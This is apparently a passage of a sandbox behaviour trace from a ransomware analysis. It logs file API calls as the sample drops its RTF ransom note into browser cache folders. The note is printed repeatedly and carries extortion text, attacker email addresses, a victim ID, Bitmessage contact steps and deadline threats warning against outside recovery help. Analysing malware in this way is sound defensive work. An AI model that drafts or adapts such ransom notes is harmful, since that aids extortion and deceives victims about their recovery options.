c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0292.245] WriteFile (in: hFile=0x2e8, lpBuffer=0x2460ba8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2460ba8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0292.257] CloseHandle (hObject=0x2e8) returned 1 [0292.760] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\28da9c56fde4021055a681112c092453f74d8dd8\\8c4d7305-348c-4e49-a93a-83143a3b9025\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\cachestorage\\28da9c56fde4021055a681112c092453f74d8dd8\\8c4d7305-348c-4e49-a93a-83143a3b9025\\#readme_eman#.rtf")) returned 0x20 [0292.760] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\1eb73b7c-1f7e-4d77-acd3-5605781472f5\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\cachestorage\\e6622492fa163609ddd4212f54512baa07929ed3\\1eb73b7c-1f7e-4d77-acd3-5605781472f5\\#readme_eman#.rtf")) returned 0x20 [0292.761] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\1eb73b7c-1f7e-4d77-acd3-5605781472f5\\index-dir\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\cachestorage\\e6622492fa163609ddd4212f54512baa07929ed3\\1eb73b7c-1f7e-4d77-acd3-5605781472f5\\index-dir\\#readme_eman#.rtf")) returned 0xffffffff [0292.761] GetLastError () returned 0x2 [0292.761] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\1eb73b7c-1f7e-4d77-acd3-5605781472f5\\index-dir\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\cachestorage\\e6622492fa163609ddd4212f54512baa07929ed3\\1eb73b7c-1f7e-4d77-acd3-5605781472f5\\index-dir\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0292.833] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.833] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.833] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up 